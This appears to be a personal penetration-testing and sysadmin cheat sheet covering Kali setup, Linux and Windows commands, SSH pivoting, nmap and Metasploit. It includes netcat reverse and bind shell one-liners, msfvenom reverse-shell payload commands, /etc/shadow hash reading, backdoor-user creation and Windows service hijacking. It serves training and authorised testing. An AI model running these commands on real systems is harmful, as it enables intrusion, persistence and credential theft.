stephensemmelroth.com

troubleshooting

http://portquiz.net:3389/ - used for troubleshooting *outbound* ports. for example: is there something (internal firewall rules, router, ISP) preventing me from reaching a remote port somewhere?
did you remember the shebang?
how is your VM connected?

recon

company website
sec.gov (edgar)
- 10k - annual reports
- 10q - quarterly reports
- Exhibit 5 - NASDAQ connectivity
iana / whois / dns lookup
metadata
CIA: confidentiality, integrity, availability. where is data weak?
job listings
email address format

getting kali running under virtualbox

option 1:download virtualbox-specific image and 'import appliance' after unzipping
note: kali is a debian-based distribution (useful when building virtual machine/appliance)
in terminal: UPDATE:)
- kali made it easier to integrate virtualbox. summary: apt-get install -y virtualbox-guest-x11)
- http://docs.kali.org/general-use/kali-linux-virtual-box-guest>
- old way:
  - -headers-$(uname -r)
    - in virtualbox menu:Devices>Insert Guest Additions CD image...
    - guest additions allows features like shared clipboard, resolution resizing, etc
- in terminal: cd /media/cdrom
  - make sure it's there: ls
  - run the guest additions installer: sh ./VBoxLinuxAdditions.run
- may need to add two lines to interfaces file to get networking up and running
  - open your network interface: vi /etc/network/interfaces
  - add two lines under the loopback:
    - auto eth0
    - iface eth0 inet dhcp
  - wifi: use NAT 'cable connected' [Devices>Network>Network Settings]
  - Devices>Network>Network Settings]
    
    note: some wired realtek network chipsets will not work but intel chipsets have a higher probability of working correctly. my built-in realtek hasn't had any issues. i recommend keeping a couple wired dongles on hand just in case.
restart vm
default shared folder is /media/sf_XXXXX
virtualbox shortcuts
- host is usually the right control key
- full screen: host + F
- scaled screen: host + C
- auto adjust screen: host + A
- screenshot: host + E

getting kali running with vmware

shared folders (or just download the vmware-specific image (non-iso) from kali)

vm settings>options>shared folders> add folder
player>manage>reinstall vmware tools
open mounted dvd, extract rar
open terminal, navigate to extracted folder: ./vmware-install.pl -d
reboot vm
open terminal, navigate to /mnt/hgfs/
celebrate

build the exploit workflow

add options to right click menu context
- navigate to ~/Templates
- add different file types you want as options in the right click menu (ex: bash/html shell files)
 - perl: touch perl.ph
 - shebang: #!/usr/bin/env perl
 - end of line comment #
 - python 2.7x: touch python2.py
 - shebang: #!/usr/bin/env python
 - end of line comment #
 - python 3.x: touch python3.py
 - shebang: #!/usr/bin/env python3
 - end of line comment #
 - bash: touch bash.sh
 - shebang: #!/usr/bin/env bash
 - end of line comment #
 - ruby: touch ruby.rb
 - shebang: #!/usr/bin/env ruby
 - end of line comment #
 - html: <html><head><title>test</title></head><body> &nbsp&nbsp&nbsp test
 - text: text
add custom commands to bash

add the directory to the PATH or do the following to add each individual binary:
make sure script works (ex: #perl scriptname.pl)
add run permissions: #chmod 755 scriptname.pl
delete file extension (scriptname.pl > scriptname)
drop script in /usr/bin/
test from command line: #scriptname

kali quirks
- gnome-terminal is kind of awkward. with a million tabs open it's nice to label them.
  - use: PS1="\[\e]0;YOUR TITLE GOES HERE\a\]\u@\h:\w\$ "
- hotkeys in gnome-terminal
  - ctrl+shift+t ::: new tab in same window
  - ctrl+shift+c ::: copy
  - ctrl+shift+v ::: paste

ssh

ssh user@server ::: ssh into a remote server as user
automate ssh login: use sshpass for a secure copy
- sshpass -p "password" scp user@server:<file path> <local path>
ssh tunneling
- use-case acronyms
 - LP ::: local listen port on attacker box
 - LH ::: local host, attack box
 - RH ::: remote host, victim box
 - RP ::: remote port,
 - PB ::: pivot box. attacker can access pivot. pivot can access victim
 - -L ::: local port
 - -R ::: remote port
 - -D ::: dynamic port forwarding
 - -N ::: NO SHELL
 - -T ::: NO TTY
- general syntax
 - ssh -L LP:RH:RP PB ::: simple tunnel. connecting to LP forwards traffic to RH's RP
 - ssh -R RP:LH:LP PB ::: advertises a local port on remote pivot box
 - ssh -D YYY -NT -p XXX u@LH ::: dynamic port forwarding. connects to self on XXX and dynamically port forwards a session from localhost out on YYY. effectively chains the new SSH connection through the previous tunnel
 - use 9050 at YYY to use proxychains
- example
 - path a-b-c-d
 - a - attacker
 - b - pivot 1
 - c - pivot 2
 - d - loot box
- proxychains
 - proxychains is quite powerful and allows lots of port forwarding
 - start with ssh
 - ssh -D YYYY IP -NT
 - define socks4 port YYYY in /etc/proxychains.conf (default is 9050)
 - socks4 does the magic for you
 - ssh builds the framework, proxychains does the magic
 - open a new terminal
 - proxychains <network_based command> [like ssh -D YYYY IP -NT]
 - if ssh -D into another host, comment out YYYY and add a line YYYX in .conf
 - run an new proxychains <network_based command>
 - proxychains automatically knows to tunnel through the previous tunnel
 - links remain available until session ends. to re-use a previous tunnel, uncomment in .conf
- config file in: /etc/ssh/sshd_config

openssl

openssl s_client -connect ip:port ::: ssh into a remote server as user

linux incantations

everything in linux is file
- use the file command to learn what type of file it is
path - the path is where scripts/executables live (ls, cat, ping, etc)
- to fix a path: export PATH=$PATH:/sbin:/usr/sbin:/bin:/usr/bin
re-run the same exact command again with the same parameters: !command
apt-get update ::: updates application repository locations
apt-get upgrade ::: grabs updates from registered repositories and upgrades
passwd root ::: changes root password
cat /etc/passwd ::: reads the user/pass file without passwords/hashes
cat /etc/shadow ::: get the hashes
date ::: prints system time
nautilus . ::: launches file explorer gui. needs the period to launch same directory
echo -n "sometext" | md5sum ::: gets the md5sum of a string.
cd ::: change directory
- cd ~ ::: change to home directory
- cd / ::: change to filesystem root directory
ls::: print directory contents
- ls -a ::: print all directory contents, including hidden (filename starts with a period)
find files on a box
- locate ::: find a file
  - may need to updatedb prior to use to update database
- find ::: recursively finds a file based off of filenames
  - search disk for file permissions
  - supports regular expressions
  - find world writable folders: find / -maxdepth 3 -type d -perm -777
- which ::: another way to locate/find. returns files in the PATH
- whereis ::: another way to locate/find
uname -a ::: system type, host name, kernel, domain name, etc
cat /etc/machine-id ::: print machine id
id ::: what's my current user id?
last ::: shows last logged on users
w::: shows users currently logged on
who::: displays current username and activity
whoami::: displays current username
ls ::: print working directory contents. equivalent of windows DIR
- ls -la ::: print working directory contents with file permissions
lsof ::: shows open files
lsmod ::: currently loaded kernel modules
arp ::: shows arp cache
ss ::: dumps socket connections
netstat ::: shows network connections, routing tables, etc
- netstat -antup
  - -a all types (listening, connected)
  - -n don't resolve names
  - -t tcp connections
  - -u udp connections
  - -p shows programs associated with each port
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done ::: prints a list of all cronjobs by username
users and groups
- useradd -g <gid> -c <comment> -u 0 <username> ::: add user/user add. UID 0 is root
- userdel ::: delete user
- usermod -G root userx ::: modify userx and assign root privileges
- usermod -g 0 -o userx ::: modify userx and assign group 0 (root) privileges
- groupadd -g <gid> <groupname>::: make a group
- getent passwd::: user info
- getent group::: group info
grep ::: search lines of previous output
- --color ::: colors results
- --color=always ::: keeps coloration throughout pipeline
- -Eo
- grep -R password . ::: recursively searchs from THIS DIRECTORY for password
- grep -RilE "text1|text2|("\w{3,6}")" ::: recursively searches (finds) local directory for either text1 or text2 or an alphnum length 3-6 in a file and prints the filename and location. -E is for regular expressions
- grep -v "string" ::: exclude results that match string
awk ::: specifically designed to parse text files. essentially can grep and cut
- awk '/search_string/ { do_this; do_this_too; }' file_to_parse
sed ::: changes/manipulates strings.
cut ::: splits output based on delimiter (default - tab)
tr ::: translates text to other text
sort ::: sorts output alphanumerically
uniq -c ::: uniq takes a *pre-sorted* list and only shows unique entries. -c shows count for each unique item
wc -l ::: counts lines
column ::: puts output in column format with tab-delimited
tree ::: prints file system in a tree-like format. not installed on some versions
xargs ::: pass arguments to the next line
tee ::: splits output to BOTH stdout AND a file (or files)
- echo "hello world | tee -a a.txt b.txt ::: sends hello world to both stdout and appends to two text files
lsattr :::
chattr :::
head -x ::: show the first x lines of output
tail -x ::: show the last x lines of output
ps ::: shows processes for local user
- ps aux
  - a - show processes for all users
  - u - display process owner
  - x - show process not attached to terminal
sleep X ::: sleeps (waits) for X seconds
wait X ::: wait until process with ID X terminates
service --status-all ::: prints a list of all services
- service XXX start
- service XXX stop
fdisk -l ::: shows disk partition table
mount ::: mounts file system
- for nfs try:
  - apt-get install nfs-common
  - apt-get install mount.nfs
  - showmount -e [ip] ::: grab a list of available mount points
  - mount.nfs [ip]:/remote/path /local/mount/point
dos2unix ::: adds end of line (eol) characters
unix2dos ::: removes end of line (eol) characters
echo XXX | base64 --decode ::: decode base64
echo XXX | xxd -r ::: decode hex back to ascii
alias rot13="tr '[A-Za-z]' '[N-ZA-Mn-za-m]'" ::: make an alias for rot13
touch <filename> ::: makes a file
mkdir <dirname> ::: makes/creates a directory
rm <filename> ::: delete a file
rm -r <dirname> ::: delete/remove a directory
chmod xxx ::: change permissions
chown <user>:<group> ::: changes permissions for user and group
wget XXX.com ::: download XXX.com's landing site code
host XXX.com ::: get XXX.com's IP address (host command)
- host -t nx XXX.com ::: name servers
- host -t mx XXX.com ::: mail servers
- host -l XXX.com ns1.XXX.com ::: DNS zone transfer. XXX domain and name server
 - can also use dnsrecon or dnsenum
 - dnsrecon -d <ip> -t zonewalk
 - can also use fierce [ip]
 - and there's an nmap script for it, too
curl :::
run a command in the background
- type the command and put & (ampersand) at the end
- each command will run as a separate process simultaneously
- this is similar to multi-threading
use gcc to compile and run a c program
- gcc hellur.c -o hellur1
- chmod 777 hellur1
- ./hellur1
vim / vi
- show context menu
  - control+c
  - esc
- quit without saving
  - :quit
  - :q
  - :q!
- save and exit
  - :x
  - esc + (shift+z) + (shift+z)
- where's the help menu?????
  - :help

linux structures (bash)

casting
- most of linux is strings. to treat them like integers (local casting), do this:
- a="123"; b="456" ::: defines two string variables
- c=`expr $a + $b` ::: cast strings as integers and add.now c=579
arrays
- a=($(cat this.txt)) ::: creates a string variable with all the lines in this.txt
- numberoflines=${#a[@]} ::: tells bash to treat the variable like an array and set numberoflines equal to array length (zero indexed)
- lastelement=${a[($numberoflines)]} ::: sets variable lastelement to the last line value
- b=(one two three four five)
- echo ${b[*]} ::: prints "one two three four five" to screen
- echo ${b[2]}::: prints "three"
loops
- while structure
 - variable=0
 - while [ $variable -lt 15 ]
 - do
 - things to be done
 - done
- until structure
 - until is the OPPOSITE of while and will initiate with a false condition and execute UNTIL the condition is true
 - same structure as a while loop
 - useful when interacting with the command line and waiting for events
- for structure on iteration
 - for ((i=0; i<$variable; i++));
 - or: for i in $( ls )
 - or: for i in `seq 1 10`
 - do
 - things to be done
 - done
- for structure on array
 - for $element in ${a[*]}
 - do
 - things to be done
 - done
- if structure
 - if [ $varible > 0 ]
 - then
 - things to be done
 - else
 - other things to be done
 - fi
 - http://ryanstutorials.net/bash-scripting-tutorial/bash-if-statements.php
- break ::: prematurely exits loop
- continue ::: prematurely jump to next loop iteration
- exit ::: completely exits script
shell syntax
- > ::: redirects to file
- >> ::: appends to file
- | ::: pipes output to next command
- * ::: wildcard
- ^ ::: starts with
- $ ::: ends with
- & ::: AND. execute regardless of previous success
- && ::: AND. execute only if first command is successful
- || ::: OR. execute regardless of previous success
- 2>/dev/null ::: send error output to waste done bin
functions
- function xyz { ::: define function
  - things to be done
  - echo $1 ::: echo the first parameter sent to the function
- } ::: close function
- xyz ::: call the function
- xyz echothis ::: call the function with an input
read user input from command line
- interact with command line
  - echo "enter input"
  - read THISINPUT
  - echo "input entered: $THISINPUT"
- command line arguments
  - call script from command line
    - ./script.sh
      - traditional way to run a script
      - can also run with /path/to/file/file.extension (elf/sh)
    - bash script.sh
      - run script without shebang
      - still takes command line arguments
  - call script with command line arguments (input)
    - ./script.sh input1 input2 ::: takes two inputs
  - handle inputs within script
    - a=$1 ::: $1 is the input1 parameter
    - b=$2 ::: $2 is input2 parameter

linux auditing

linux inode - inodes contain file metatdata (permissions, ownership, type). useful to find file change times, etc. ls and stat print inode data
multitail
- from https://www.vanheusden.com/multitail/ ::: "MultiTail allows you to monitor logfiles and command output in multiple windows in a terminal, colorize, filter and merge."
- apt-get install -y multitail
journalctl
auditctl
things to look for
- wrong permissions
- out-of-order inodes
- recently modified/changed/created files
find /bin /usr/bin /sbin /usr/sbin -amin -20 | more ::: reads all binaries that have been modified in the last twenty minutes
- amin/atime -x/+x ::: access minutes/days (
- cmin/ctime -x/+x ::: change minutes/days
- mmin/mtime ::: modify minutes/days
getfacl ::: sets directory access control list for a directory. admins can use acl masks to elevate user permissions above group permission while retaining lower chmod settings
- setfacl
auditctl
journalctl
ausearch ::: reads audits
file sharing
- smbclient: connects to samba shared folders
 - smbclient -NL IP ::: returns a service list on Samba share. N skips password request
 - smbclient -N \\\\<netbiosname>\\<sharedfolder> ::: anonymous access to shared folder. double the backslashes required or escape each one: /\/\
- rpcclient: connects to samba shared folders
 - lsaenumsid ::: pulls SIDs from a null session
 - srvinfo ::: pull server info from a null session

linux forensics and privilege escalation

try sudo su
try to add user to sudoers group: usermod -aG sudo username
linenum -
- https://github.com/rebootuser/LinEnum
check users
- cat /etc/passwd
- cat /etc/shadow
- getent group
show user directory content
- root: ls /root
- userA: ls /home/userA
check binary dates
- ls -lta /bin/ > bin.txt
- ls -lta /usr/bin
- ls -lta /sbin/
- ls -lta /usr/sbin/
cronjobs
- cat /etc/crontab
- ls -lta /etc/cron.hourly
- ls -lta /etc/cron.daily
- ls -lta /etc/cron.weekly
- ls -lta /etc/cron.monthy
- ls -lta /etc/cron.d
check startup
- ls /etc/inittab
- ls /etc/init
- ls /etc/init.d
- cat /etc/bash.bashrc
- ls /etc/rc.d
- cat /etc/rc.d/rc.0
- cat /etc/rc.d/rc.1
- cat /etc/rc.d/rc.2
- cat /etc/profile
- ls /etc/profile.d
processes
- ps -aux
networks
- arp
- arp without root: cat /proc/net/arp
- netstat -antup
- lsof -i
- getent networks
interesting greps
- http://regexr.com/
- ssn
  - you SHOULD NOT FIND THESE. if you do, escalate appropriately!
  - grep '[0-9]\{3\}-[0-9]\{2\}-[0-9]\{4\}' -lr
  - egrep "[0-9]{3}[-]?[0-9]{2}[-]?[0-9]{4}" -lr
  - ^(\d{3}-?\d{2}-?\d{4}|XXX-XX-XXXX)$
- credit card numbers
  - you SHOULD NOT FIND THESE. if you do, escalate appropriately!
  - grep '$[345]\{1\}[0-9]\{3\}\|6011$\{1\}[ -]\?[0-9]\{4\}[ -]\?[0-9]\{2\}[-]\?[0-9]\{2\}[ -]\?[0-9]\{1,4\}' -lr
- phone numbers
  - grep '$([0-9]\{3\})\|[0-9]\{3\}$[ -]\?[0-9]\{3\}[ -]\?[0-9]\{4\}' -lr
  - grep '\d{3}[\s\-]{0,1}\d{3}[\s\-]{0,1}\d{4}' -lr
- passwords
  - grep 'password' -lr

netcat (unencrypted) and ncat (encrypted option)

http://netsec.ws/?p=292
nc is an alias for netcat. ncat is a netcat rebuild with options to encrypt, chain, and use SOCKS4, HTTP, and ipv6
ncat for windows here: https://nmap.org/ncat/
listen
- nc -lvp <port number>
listen on windows and give command prompt (bind shell)
- nc -lvp <port number> -e cmd.exe
send bash shell from linux (reverse shell)
- with full netcat: nc -vn <ip> <port> -e /bin/bash
linux bind shell
- without netcat: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | exec 3<> /dev/tcp/localhost/1235 > /tmp/
- with netcat: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
send a file
- nc -vn <ip> <port> < filename.ext
receive a file
- nc -lvp <port> > filename.ext
establish a secure connection
- ncat --ssl <ip> <port> ::: **note** uses ncat and not netcat
build a tunnel from a to c through pivot b (proxy)
- on b:
 - first validate no other services running on ports. previous netcats will klobber new data
 - nc -lp [a_port] < backpipe | nc -lp [c_port] > backpipe
- on a:
 - in /tmp/: mknod backpipe p
 - nc -nv [b_ip] [a_port]
- on b:
 - nc -nv [b_ip] [c_port] < file.txt

msfvenom - make a payload that talks with metasploit

good resource: https://netsec.ws/?p=331
general syntax:
- msfvenom -p <MSF_directory_payload> LHOST=<pentester's IP> LPORT =<pentester's port> -e <encoder> -f <format> > filename.ext
if you don't need an encoder "example"
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<pentester's_IP> LPORT=<pentester's_port> -f asp > shell.asp
for thorough examples go here
- http://netsec.ws/?p=33
common outputs
- windows: -f exe > shell.exe
- linux:
 - -p linux/x86/meterpreter/reverse_tcp
 - -f elf > shell.elf
- bash (slightly different from linux):
 - -p cmd/unix/reverse_bash
 - -f raw > shell.sh
- mac: -f macho > shell.macho
- asp: -f asp > shell.asp
- php: shells are pretty bad. especially on windows
 - this is the one most sites show but pbcopy / pbpaste don't seem to work in kali.
 - -f raw > shell.php
 - cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 - this one actually works
 - msfvenom -p php/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=xxx-f raw >venomshell.php
 - after getting the php shell (which have dysentery), upload a BETTER, native shell with meterpreter and initiate via the php session with execute -f shell.exe
 - pentestmonkey's php shell works well for linux and requires mods for windows
meterpreter is a (ruby) payload that msfvenom can build. meterpreter works by using dynamic dll injection.
reverse_tcp is a specifc type of meterpreter payload that initiates an outbound shell connection from the host back to pen-tester. the pen tester needs to initiate a way to catch the callback, often with a multihandler.

nmap

very useful scanning tool, especially when utilzing NSE: nmap scripting engine (*.nse)

https://nmap.org/nsedoc/categories/
nmap x.x.x.x ::: scan host. scans top 1000 ports
nmap -F x.x.x.x ::: fast scan. scans top 100 ports
nmap -p a x.x.x.x ::: scan port range a-b on host
nmap x.x.x.0/24 ::: scan entire subnet
nmap -p- x.x.x.x ::: scan all ports
scripts
- nmap -sV --script=smb* x.x.x.x ::: conducts version scan and runs all smb scripts
- nmap -sV -p A --script=<script_name.nse> x.x.x.x ::: version scan on port A then runs script
- nmap --script=dns-service-discovery -p 5353 x.x.x.x ::: runs a NSE script that attempts to discover dns services on a host
nmap -n ::: forgoes DNS resolution
-oA <filename.txt> ::: saves output to file. grep-able, xml, all three formats
-oX <filename.txt> ::: output that zenmap, sparta and db_nmap can import
-sP/-Pn/sU ::: protocol scan/syn scan/full tcp connection scan
-sO/-sS/-sT ::: protocol scan/syn scan/full tcp connection scan
nmap -f x.x.x.x ::: avoid firewall by fragmenting
/usr/share/nmap/scripts ::: default script location

metasploit (msfconsole)

consider indexing framework to enable quick search
- service postgresql start
- first time: msfd init
- later: msfd start
actually start metasploit from the terminal
- msfconsole
- check connection to database: db_status
- first time build cache: db_rebuild_cache
set up a listener: use exact same payload name, LHOST, and LPORT as in msfvenom
- use exploit/multi/handler
- show options
 - may need to show advanced or show targets
 - consider set VERBOSE true
- set PAYLOAD <payload name> - windows/reverse_tcp
- set LHOST <local ip address>
- set LPORT <local port>
- exploit ::: listen and catch incoming connection
meterpreter
- get a shell: shell
- get a ruby shell: irb
  - the ruby shell is actually on the attacker box NOT the victim box
  - run commands with: system "do this thing"
- switch between sessions
  - background
  - sessions -i
  - kill a session: sessions -k [session #]
- run commands on victim box: execute -f "do this thing"
pivot
- routes all metasploit traffic for listed subnet through the host
- route add <network ip> <net mask> <session id>
- ex: route add 192.168.1.1 255.255.255.0 1 (for an established multihandler on session 1)
really loud hammers
- get system
- use post/multi/recon/local_exploit_suggester

metasploit (db_nmap)

convenient database that holds scan results by IP,
sweet help setting up the db
- http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
- https://www.offensive-security.com/metasploit-unleashed/port-scanning/
db_import_nmap_xml <file.xml> ::: import xml from other systems (nmap, zenmap)
hosts -h ::: prints help file for hosts in db_nmap
services -h ::: prints help file for services in db_nmap

wireshark

sniffer. very useful.

display filter ::: ip.addr==<ip>
https://wiki.wireshark.org/DisplayFilters

html

test webpage. create a new file and type the word one of the following in it. set filetype as html and load in browser.
- <html><head><title>test</title></head><body> &nbsp&nbsp&nbsp test
space: &nbsp
newline:

sparta

sparta: python gui used to automate secondary tools. can run some nse scripts, launch dirburster/nikto, etc. can import but not export nmap xml. cannot run specific nmap scripts yet without editing conf file. the secforce guys are pretty good at responding

controller.py - main python framework
sparta.conf
- nikto.
 - consider removing it from staged scan if scanning many hosts: delete the nikto line from under [SchedulerSettings]
- snmpcheck. it appears snmpcheck does not work under kali sana. try:
 - #sudo gem install snmp to add the required ruby gem. or:
 - grab the new version from nothink (or older python version), chmod and drop it in /usr/bin/ without the file extension
 - update .conf (see below)
- nmap script categories
 - add to [HostActions] to run independently if required
 - nmap-nsed-tcp=Run nmap NSE default, "nmap --script default [IP] -oA \"[OUTPUT]\""
 - nmap-nsev-tcp=Run nmap NSE vuln, "nmap --script vuln [IP] -oA \"[OUTPUT]\""
 - nmap-nseb-tcp=Run nmap NSE brute, "nmap --script brute [IP] -oA \"[OUTPUT]\""
 - nmap-nsee-tcp=Run nmap NSE exploit, "nmap --script exploit [IP] -oA \"[OUTPUT]\""
- add to [PortActions]
 - snmpcheck. snmpcheck=Run snmpcheck, "snmpcheck [IP] -p [PORT]", snmp
 - samrdump. update to samrdump=Run samrdump, python /usr/share/doc/python-impacket/examples/samrdump.py [IP] [PORT]/SMB, "netbios-ssn,microsoft-ds"
 - smbclient. update .conf to smbclient=Connect with smbclient, "smbclient -NL [IP] -p[PORT]", "netbios-ssn,microsoft-ds"
- dns on isolated network.
 - add port 53 (DNS) to stage1's scanned ports (this quickly finds a local dns server)
 - add local dns resoution to sparta's database (adds hostnames next to ip addresses).
 - find the dns server and verify it resolves hostnames
 - add command under [HostAction]. [PortActions] works but sparta does not add the results to the database.
 - nmap-dns-tcp=Run nmap (dns resolve tcp), nmap -f [IP] --dns-servers <dns server ip> -oA \"[OUTPUT]\"
 - works for one dns server. check nmap's manual to resolve against multiple servers
- gobuster
 - useful to brute force directories
 - gobuster=Launch gobuster, gobuster -w /directory/to/wordlist.txt -u [IP]:[PORT], "http,https,ssl,soap,http-proxy,http-alt

programs for things

zenmap: gui for nmap. very nice. can run specfic, crafted scans/nse scripts
proxychains/sshuttle: two different port-forwarding / tunneling programs
mimikatz: ram scraper. nom nom. functional in sana
simplehttpserver: nice little http server written in python
- build server on port 9999: python -m SimpleHTTPServer 9999
- bring file from server to host: wget http://[ip]:port/filename
- or just browse to http://[ip]:[port]
pureftpd: simpe ftp server built with a security mindset
nano / pico
- text editor. pico is an alias for nano
- ctrl+x to exit. it will ask you to save and prompt for name change

privilege escalation

linux
- g0tmi1k's linux privilege escalation tutorial
  - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- enumeration
  - bash: linenum
    - https://github.com/rebootuser/LinEnum
  - bash: unix-privesc-check
    - http://pentestmonkey.net/tools/audit/unix-privesc-check
  - python: LinuxPrivChecker
    - http://www.securitysift.com/offsec-pwb-oscp/
- TTY shell upgrade
  - http://netsec.ws/?p=337
- check stuff
  - date
  - cat /etc/*-release
  - try sudo su
  - whoami
  - id
  - os release and architecture
    - uname -a
    - uname -i ::: which architecture
    - lsb_release -a
    - cat /etc/issue
  - hostname
  - pwd
  - echo $PATH
  - netstat -antup
  - arp
  - lsof -i
  - service --status-all
  - cat /etc/passwd
  - grep -vE "nologin|false" /etc/passwd
  - ps aux
  - can you...
    - write files? have you tried /tmp?
    - add a user?
    - mimic another user?
    - run arbitrary code or traverse directories as another user?
windows
- privilege escalation tutorial - http://www.fuzzysecurity.com/tutorials/16.html
- https://kellgon.com/exploitation/index.html
- microsoft systernals suite
  - https://technet.microsoft.com/en-us/sysinternals/bb842062
  - specifically accesschk
  - srvcheck3.exe (accesschk's predecessor before xp sp1)
- cheat sheets
  - https://highon.coffee/blog/

sweet links

http://netsec.ws/
- buffer overflow tutorials, privilege escalation tutorials, etc
http://pentestmonkey.net/
- cheatsheets, tool tutorials, shells, SQL injection, etc
https://kellgon.com
- recon, forensics, exploitation, tool kits
https://highon.coffee/
- walkthroughs, at-a-glance sheets
tradecraft practice
- oscp - pen testing with kali
- metasploitable
- arizona cyber range
- capture the flag competitions (ctf)
https://www.gasmi.net/hpd/
- packet decoder. paste in hex data. basically wireshark for web
draw.io
- like visio but free and cloud-based. works well for drawing network diagrams
https://gchq.github.io/CyberChef/
- Cyber Chef. Great for regular expressions, base64 decoding, encryption, etc
https://github.com/51x/WHP
- windows hacking pack: nc, ncat, srvcheck, 08-067, and other windows binaries
http://www.cvedetails.com/product/585/Openbsd-Openssh.html?vendor_id=97
- which ssh is broken by what category
http://portquiz.net:3389/
- used for troubleshooting *outbound* ports. for example: is there something (internal firewall rules, router, ISP) preventing me from reaching a remote port somewhere?

mac stuff

update default screen shot on macs (cmd+shift+3/4/5)
- location
  - defaults write com.apple.screencapture location ~/Desktop/screenshots/
  - killall SystemUIServer
- filetype
  - defaults write com.apple.screencapture type jpg
  - killall SystemUIServer

windows foo

view file extensions from gui
- folder options > view tab > uncheck "hide known..." button
view file extensions from command line:
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0 /f
command line
- dir /s *something.* ::: searches for a filename that ends with "something" and any extension
run
- msconfig - check boot, services, startupwin, launch more tools
- regedit - opens registry
- cmd - spawns a shell
- powershell - spawns a powershell
kellgon has a nice basic list of commands: https://kellgon.com/exploitation/tools/cmd.html
get windows bash: http://www.zdnet.com/article/ubuntu-and-bash-arrive-on-windows-10/
remove right click context menu objects (like winrar). beware: editing the registry is mucho dangerous
- keys located here: HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers
users
- enumerate users: net users
- enumerate groups: net localgroup
- add a new user: net user pentest /add
- add the user to administrator group: net localgroup administrators pentest /add
execute commands from misconfigured services
- stop the service: net stop SERVICENAME
- look at the service: sc qc SERVICENAME
- tell the service to run a command: sc config SERVICENAME binpath= "do this thing"
- if the dependency is broken, try running with no dependency: sc config SERVICENAME depend= ""
- run this: sc config SERVICENAME obj= ".\LocalSystem" password= ""
- start the service: net start SERVICENAME
enumerate
- systeminfo

powershell

old versions look like perl but new functionality looks like c#
enable powershell scripts

old versions: Set-ExecutionPolicy unrestricted
new versions: Set-ExecutionPolicy -scope CurrentUser -executionpolicy unrestricted -force

structure: verb-noun
- noun is always singular
command line parameters/options

param([string]$variable1

linux equivalents
- dir equivalent: getchilditem
- grep equivalent: select-string "qwerty"
limit output: cmdlet | select <attribute>
$a | sort | get-unique // takes a group of objects, sorts them, and clips unique entries
get-item // gi // gets the item
get-member // gm // identifies methods available for object
string manipulation)
- $a | % { $_.split(":") } // breaks single string into X number strings by ":" delimiter
- $a | % { $_.Replace("asd", ":") } //
- $a | select-string "qwerty" // like grep for powershell. searches strings for qwerty
write content to file
- $ErrorActionPreference = "SilentlyContinue" //suppress error output
- $ErrorActionPreference = "Continue" // don't quit when something fails
- Start-Transcript -path C:\output.txt -append //output location
- do things
- Stop-Transcript // put it back together
compare-object a.txt b.txt // compares two files (diff)
registry
- reg query
- remove-registrykey
- get-itemproperty
- set-itemproperty
get user sids
- get-wmiobject win32_useraccount -filter )"localaccount"='true'" | select caption,sid
get user name, machine name
- [environment]::userdomainname
- [environment]::machinename
run wmic from powershell: Invoke-Expression "wmic <wmic command>"

wmic

wmi - windows management interface
wmic - the console that works with wmi
getwmiobject transitioning to getcimobject (in powershell)!
format: wmic <object> <verb>
output formats: table, csv, XML (raw or formatted), html table
- /output:<location>/filename.xxx /format:csv
view startup list: wmic startup list brief

potential remedial courses of action (COAs)

The overall purpose of this course of action is to preserve (CONFIDENTIALITY / AVAILABILITY / INTEGRITY)

Network connection: maintain / remove from network / limit (firewall) / honeypot
System: Antivirus / sensor / virtualize / swap for backup
Physical: Secure the system / no change
Forensics: Conduct / do not conduct
Network: Inspect for additional infections / Do not inspect / isolate / add sensors

Risks associated with this course of action

Confidentiality: gain / data loss potential
Integrity: gain / loss / interrupted
Availability: gain / loss / interrupted
Intelligence gathering and incubation: gain / loss
Entry vectors: identified / unidentified

Steps to remediate

User retraining
Restrict users
Patch systems
Add host and network sensors
Capture traffic
Implement VLANs
Add/update/upgrade IDS/IPS
Implement/update/upgrade host and network firewalls
Honeypot / honeynet
Virtualize
Add specific ACLs, iptables, IDS/IPS rules
Deep packet inspection
Do nothing (usually do to cost or apathy)

tcl

tool command language
interfaces with cisco ios devices
name.tcl
run/execute a native ios command (system call)

exec "show ip interface brief"
puts [ ios_config "do sh ip int br" ] ::: difference is DO

assign a variable
- set x 2
- set y $x
- set z [ expr { rand() } ]
print variable to screen
- puts stdout $z

packets

ethernet frame header

802.1q vlan trunking adds two bytes between source address and type fields

dest - src - PROTOCOL ID - CONTROL INFO - type (8100) - data - crc

ip datagram

the evil bit - this nasty bit is (almost never) used for legitimate traffic. it sits in the IP header under byte6's second place [0x49]. reference rfc3514.
these sweet little pictures were originally based on SANS pamphlets from around 2016. i updated them. share as you will but throw back some love por favor.
because everyone needs some keywords: version, IHL, TOS, IP ID, reserved, do not fragment, protocol

tcp datagram
- these sweet little pictures were originally based on SANS pamphlets from around 2016. i updated them. share as you will but throw back some love por favor.
- because everyone needs some keywords: src port, dst port, sequence number, header length, flags, CWR ECE URG ACK PUSH RST SYN FIN, and urgent
ipv6 - i will probably get here at some point. just have not built the cute little picture yet.

manual smtp

start with your favorite socket opener. connect to the remote system on (usually) port 25
hopefully you get a 220 response indicating the service is running. this is exciting
try typing EHLO or HELO. if the response is a bunch of 250 responses, you are in so much luck. if the response is 421 your day is maybesad.
- note: the server should respond with every valid command here. if doing a audit/pentest, play around with all the options. they might lead to data discovery or possibly a way in. refer to disclaimer above
- vrfy is interesting because (if enabled) it will verify if a name exists or not.
try the mail from command. this command tells the server how to respond to bounces like recepient not found. it looks like mail from: <eeee@yyy.com>. hopefully you get another 250 response. if you do, go to the next step. if not, be verysad.
now do rcpt to: <eeee@yyy.com>. this is where you want the respondent REPLY to go. hopefully you get another 250
now just type data and press enter. you should get a 354 ok response. then type your message for the body of the email. when done press enter again. the server should send your fancypants email

stephen semmelroth

cyber tradecraft